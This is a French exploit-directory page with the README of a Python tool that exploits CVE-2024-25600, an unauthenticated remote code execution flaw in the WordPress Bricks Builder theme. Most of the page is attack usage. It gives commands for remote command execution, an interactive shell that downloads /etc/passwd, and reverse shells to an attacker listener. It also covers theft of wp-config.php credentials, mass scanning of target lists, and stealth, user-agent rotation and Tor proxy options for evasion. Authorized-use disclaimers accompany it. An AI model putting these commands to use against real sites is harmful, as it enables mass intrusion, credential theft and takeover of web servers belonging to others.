Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - Exploit RCE non authentifié pour le thème WordPress Bricks Builder. Cadre d'exploitation avancé avec shell interactif, shells inversés, téléchargement/téléversement de fichiers, analyse asynchrone, mode furtif, prise en charge de proxy et analyse de vulnérabilité multi-thread. Pour tests de sécurité autorisés uniquement. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
ReconnaissanceScanners de VulnérabilitésExploitationShellcodeExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Développement de Charges Utiles
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

Voir le dépôt
11il y a 1 moisPas encore vérifié

À propos

CVE-2024-25600 - Exploit RCE non authentifié pour le thème WordPress Bricks Builder. Cadre d'exploitation avancé avec shell interactif, shells inversés, téléchargement/téléversement de fichiers, analyse asynchrone, mode furtif, prise en charge de proxy et analyse de vulnérabilité multi-thread. Pour tests de sécurité autorisés uniquement.

Partager

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder RCE non authentifiée

Python Version CVSS CVE License Platform

Outil d'évaluation de sécurité autorisé pour CVE-2024-25600
Auteur : Sudeepa Wanigarathna · Outil : BricksRCE Exploiter v1.0
Script principal : cve-2024-25600.py

b

[!IMPORTANT] Utilisation autorisée uniquement. Cet outil est destiné à la recherche en sécurité, à l'éducation et aux tests de systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive.


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Fonctionnalités
  • Installation
  • Démarrage rapide
  • Guide d'utilisation
  • Référence des commandes
  • Shell interactif
  • Sortie et journalisation
  • Dépannage
  • Structure du dépôt
  • Historique des versions
  • Avertissement
  • Auteur et crédits
  • Licence

Aperçu

CVE-2024-25600 est une vulnérabilité critique d'exécution de code à distance non authentifiée dans le thème WordPress Bricks Builder. La gestion incorrecte des entrées contrôlées par l'utilisateur dans le point de terminaison REST render_element permet à des attaquants non authentifiés d'exécuter des commandes PHP/système arbitraires sur les installations affectées.

BricksRCE Exploiter (cve-2024-25600.py) est un outil d'évaluation Python complet destiné aux professionnels de la sécurité autorisés pour :

  • Détecter les installations vulnérables de Bricks Builder
  • Valider l'impact avec une exécution de commande contrôlée
  • Interagir avec les hôtes compromis via un shell interactif
  • Scanner en masse des listes de cibles avec des workers asynchrones / threadés
  • Exporter des résultats structurés pour les rapports

Détails de la vulnérabilité

AttributValeur
Identifiant CVECVE-2024-25600
CVSS9.8 (Critique)
Vecteur d'attaqueRéseau — non authentifié
ImpactExécution de code à distance complète, compromission de la confidentialité / intégrité / disponibilité
Produit concernéThème WordPress Bricks Builder
Versions concernéesBricks ≤ 1.9.6 (corrigé dans 1.9.6.1+)
Type de vulnérabilitéExécution de code à distance non authentifiée
CWECWE-94 (Mauvais contrôle de la génération de code)

Points de terminaison concernés

Point d'accèsMéthode
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

Résumé de l'attaque

  1. Extraire un nonce Bricks du code source de la page cible
  2. Soumettre une requête render_element falsifiée avec une charge utile d'élément malveillant
  3. L'évaluation de code côté serveur conduit à l'exécution de commandes arbitraires

Références

  • CVE-2024-25600 (MITRE)
  • Entrée NVD
  • Journal des modifications / Avis de sécurité de Bricks Builder

Fonctionnalités

Capacités principales

CapacitéDescription
Détection de vulnérabilitéConfirme l'exécution de code à distance via une sonde contrôlée à base de marqueurs
Extraction de nonceDécouverte de nonce multi-méthode (scripts, source de page, meta, REST)
Détection de versionIdentifie la version de Bricks Builder depuis CSS / readme / REST
Shell interactifREPL complet avec historique, autocomplétion et transfert de fichiers
Mode commande uniqueExécute une commande et se termine (adapté aux scripts)
Aides pour shell inverseGénère des shells inverses bash / nc / Python / PHP / Perl / Ruby
Extraction de wp-configTente de localiser et lire wp-config.php
Scanner de masseScan multi-cibles asynchrone ou threadé depuis une liste d'URL

Contrôles opérationnels

CapacitéDescription
Limitation de débitDélai configurable entre les requêtes
Logique de réessaiBackoff exponentiel en cas de timeout et d'erreurs de connexion
Rotation du User-AgentEmpreintes de navigateur aléatoires par requête
Mode furtifEn-têtes Accept-Language / Accept-Encoding randomisés
Support proxyHTTP, HTTPS, SOCKS5 / SOCKS5h
Double point de terminaisonPréfère wp-json, rest_route, ou les deux
Mode forcéIgnore la pré-vérification et tente l'exploitation directement
CLI enrichieBarres de progression, tableaux et panneaux colorés via Rich

Rapports

CapacitéDescription
Export JSON / TXTSauvegarde des résultats de scan et des cibles vulnérables
Historique des commandesJournalisation optionnelle des commandes exécutées
Journalisation fichierbricks_rce.log persistant plus chemins de journal personnalisés

Installation

Prérequis

  • Python 3.8+
  • pip
  • Accessibilité réseau à la (aux) cible(s) autorisée(s)

Configuration

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows : venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

Dépendances

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # optionnel — support proxy SOCKS5

Démarrage rapide

Remplacez https://target.example par une cible de laboratoire ou autorisée uniquement.

root@kitploit:~
# Shell interactif
python3 cve-2024-25600.py -u https://target.example

# Commande unique
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# Scan de masse
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# Détection de version
python3 cve-2024-25600.py -u https://target.example --detect-version

# Via proxy Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

Guide d'utilisation

Tous les exemples utilisent le script principal : cve-2024-25600.py

1. Afficher l'aide

root@kitploit:~
python3 cve-2024-25600.py --help

2. Shell interactif sur une cible unique

Ouvre un shell interactif RCE après avoir confirmé que la cible est vulnérable.

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

Flux de travail :

  1. Normaliser et valider l'URL
  2. Extraire le nonce de la page
  3. Vérifier la vulnérabilité (sauf si --force)
  4. Entrer dans un shell interactif

3. Exécuter une commande unique

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

Sauvegarder la sortie de la commande dans un fichier :

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. Choisir le type de charge utile

root@kitploit:~
# Charge utile par défaut basée sur les exceptions PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# Charge utile basée sur system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Détecter la version de Bricks Builder

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

Combiner avec une commande :

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. Extraire wp-config.php

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

Sauvegardé sous wp-config_<cible>.txt en cas de succès.

7. Shells inverses (laboratoire autorisé uniquement)

root@kitploit:~
# Terminal 1 — écouteur
nc -lvnp 4444

# Terminal 2 — shell inverse bash
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

Tous les types de shell inverse supportés :

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. Mode forcé (ignorer la vérification de vulnérabilité)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. Scan de masse depuis un fichier

root@kitploit:~
# targets.txt — une URL par ligne
python3 cve-2024-25600.py -f targets.txt

Avec threads, délai, furtivité et sortie JSON :

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

Scan synchrone (pool de threads) au lieu d'asynchrone :

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

Scan de masse silencieux :

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. Sélection du point de terminaison

root@kitploit:~
# Les deux points de terminaison (par défaut)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# Uniquement /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# Uniquement /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. Mode furtif

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. User-Agent personnalisé

root@kitploit:~
# UA personnalisé
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# Désactiver la rotation aléatoire du UA
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. Support proxy

root@kitploit:~
# Proxy HTTP (ex. Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# Proxy SOCKS5
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (DNS via proxy / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. Vérification SSL

root@kitploit:~
# Activer la vérification du certificat SSL (désactivée par défaut)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. Sortie et journalisation

root@kitploit:~
# Sauvegarder les résultats de scan en JSON
python3 cve-2024-25600.py -f targets.txt -o results.json

# Sauvegarder les résultats de scan en TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt

# Fichier journal d'application personnalisé
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# Journaliser les commandes exécutées
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. Modes verbeux et silencieux

root@kitploit:~
# Journalisation verbeuse / debug
python3 cve-2024-25600.py -u https://target.example -v

# Mode silencieux (sortie minimale)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. Réglage des performances

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. Exemple d'évaluation complète combinée

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. Commandes intégrées du shell interactif

Après avoir démarré avec -u (sans --cmd / --reverse-shell) :

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

Référence des commandes

Options de cible

ArgumentDescription
-u, --urlURL de la cible unique
-f, --fileFichier contenant les URL cibles (une par ligne)

Options de scan

ArgumentDéfautDescription
-t, --threads10Workers concurrents pour les scans de masse
--delay0.5Délai entre les requêtes (secondes)
--timeout15Délai d'expiration des requêtes HTTP (secondes)
--max-retries3Tentatives de réessai en cas d'échec
--forceoffIgnorer la vérification de vulnérabilité
--syncoffUtiliser un pool de threads au lieu d'asynchrone

Options furtives

ArgumentDescription
--user-agentChaîne User-Agent personnalisée
--no-random-uaDésactiver la rotation du User-Agent
--proxyURL du proxy (http://, https://, socks5://, socks5h://)
--stealthActiver le mode furtif (en-têtes aléatoires + délais)
--endpointjson | rest_route | both (défaut : both)

Options d'exploitation

ArgumentDescription
--cmdExécuter une commande unique puis quitter
--payloadType de charge utile : php (défaut) ou system
--reverse-shellType de shell : bash, nc, python, php, perl, ruby
--lhostHôte de l'écouteur pour le shell inverse
--lportPort de l'écouteur pour le shell inverse
--extract-wp-configTenter d'extraire wp-config.php
--detect-versionDétecter la version de Bricks Builder
--save-outputSauvegarder la sortie de la commande unique dans un fichier

Options de sortie

ArgumentDescription
-o, --outputFichier de résultats (.json ou .txt)
--log-fileChemin personnalisé pour le journal détaillé
--command-logJournaliser les commandes exécutées dans un fichier
-v, --verboseJournalisation de débogage
-q, --quietSortie console minimale
--verify-sslActiver la vérification du certificat SSL (désactivée par défaut)

Shell interactif

Lors de l'exploitation d'une cible unique sans --cmd ou --reverse-shell, un shell interactif s'ouvre :

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

Commandes intégrées

CommandeDescription
exitQuitter le shell
helpAfficher l'aide
clearEffacer l'écran
download [remote]Télécharger un fichier distant (transfert base64)
upload [local] [remote]Uploader un fichier local vers la cible
php [cmd]Exécuter via la charge utile PHP (par défaut)
system [cmd]Exécuter via la charge utile system()

Fonctionnalités

  • Historique des commandes persistant dans ~/.bricks_rce_history
  • Autocomplétion pour les commandes courantes
  • Suggestions automatiques depuis l'historique (prompt-toolkit)

Sortie et journalisation

Console

Panneaux, barres de progression et tableaux de résultats enrichis via Rich :

root@kitploit:~
[*] Test : https://target.example
[+] https://target.example est vulnérable !
[+] Shell interactif ouvert avec succès

Tableau des résultats de scan

MétriqueDescription
Total traitéURL scannées
RéussiConfirmé vulnérable
ÉchouéNon vulnérable / inaccessible
Vulnérables trouvésNombre de cibles RCE confirmées
Commandes exécutéesNombre total d'exécutions RCE
Temps écouléDurée du scan (temps réel)

Export JSON (-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

Fichiers journaux

FichierObjectif
bricks_rce.logJournal d'application par défaut en mode ajout
--log-file CHEMINGestionnaire de journal personnalisé supplémentaire
--command-log CHEMINPiste d'audit des commandes exécutées

Dépannage

SymptômeQue faire
Nonce non trouvéConfirmer que Bricks est actif ; essayer -v ; s'assurer que la page d'accueil se charge
Cible non vulnérableVérifier Bricks ≤ 1.9.6 ; essayer --force ; vérifier les deux points de terminaison
Timeouts de connexionAugmenter --timeout / --max-retries ; vérifier le proxy
Limité par débit (429)Augmenter --delay ; activer --stealth
Erreurs SSLPar défaut, la vérification est désactivée ; utiliser --verify-ssl uniquement si nécessaire
Instabilité asynchroneUtiliser --sync pour le scan threadé
Échec du shell inverseConfirmer que l'écouteur est actif ; essayer d'autres types de shell (python, nc)
Sortie de commande videLa commande a peut-être réussi sans stdout ; essayer echo test
wp-config non trouvéLes chemins varient selon l'hôte ; utiliser le shell interactif avec find / cat personnalisé

Flux de débogage

root@kitploit:~
# Vérification verbeuse d'une cible unique
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# Via Burp pour inspection des requêtes
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# Préférer un point de terminaison spécifique
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

Structure du dépôt

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
├── requirements.txt      # Dépendances Python
├── README.md             # Ce fichier
├── bricks_rce.log        # Journal d'exécution (généré)
└── venv/                 # Environnement virtuel local (optionnel, non commité)

Historique des versions

v1.0.0 — Version initiale

  • Détection et exploitation RCE non authentifiée pour CVE-2024-25600
  • Extraction de nonce multi-méthode
  • Shell interactif avec upload / download
  • Modes commande unique et shell inverse
  • Scan de masse asynchrone / threadé
  • Détection de version et extraction de wp-config
  • Mode furtif, rotation UA, support proxy
  • CLI enrichie avec export de résultats JSON/TXT

Avertissement

Ce projet est fourni en l'état pour la recherche défensive en sécurité et les tests d'intrusion autorisés.

En utilisant ce logiciel, vous acceptez que :

  1. Vous ciblerez uniquement des systèmes que vous possédez ou pour lesquels vous êtes explicitement autorisé à tester.
  2. Vous comprenez les lois applicables en matière d'abus informatique et de protection des données.
  3. L'auteur et les contributeurs ne sont pas responsables des dommages, pertes de données ou conséquences juridiques découlant d'une mauvaise utilisation.

Si vous découvrez cette vulnérabilité dans des environnements de production que vous ne possédez pas, suivez les pratiques de divulgation responsable et coordonnez-vous avec le propriétaire du site / l'équipe de sécurité de Bricks Builder.

L'accès non autorisé à des systèmes informatiques est un crime fédéral.


Auteur et crédits

RôleNom
Auteur de l'outilSudeepa Wanigarathna
CVECVE-2024-25600
OutilBricksRCE Exploiter v1.0
Script principalcve-2024-25600.py
LicenceMIT

Licence

root@kitploit:~
Licence MIT

Copyright (c) 2024–2026 Sudeepa Wanigarathna

Par la présente, une autorisation est accordée, gratuitement, à toute personne obtenant une copie
de ce logiciel et des fichiers de documentation associés (le « Logiciel »), de traiter
le Logiciel sans restriction, y compris sans limitation les droits
d'utiliser, de copier, de modifier, de fusionner, de publier, de distribuer, de sous-licencier et/ou de vendre
des copies du Logiciel, et d'autoriser les personnes auxquelles le Logiciel est
fourni à le faire, sous réserve des conditions suivantes :

L'avis de droit d'auteur ci-dessus et cet avis d'autorisation doivent être inclus dans toutes
les copies ou parties substantielles du Logiciel.

LE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU
IMPLICITE, Y COMPRIS MAIS SANS S'Y LIMITER LES GARANTIES DE QUALITÉ MARCHANDE,
D'ADÉQUATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON.

Support

  • Mettez une étoile au dépôt si cela aide votre recherche autorisée
  • Ouvrez des issues pour les bogues, faux positifs ou améliorations de détection
  • Les pull requests sont les bienvenues pour la documentation et l'UX en laboratoire autorisé

Pour tests de sécurité autorisés uniquement.

Télécharger l’outil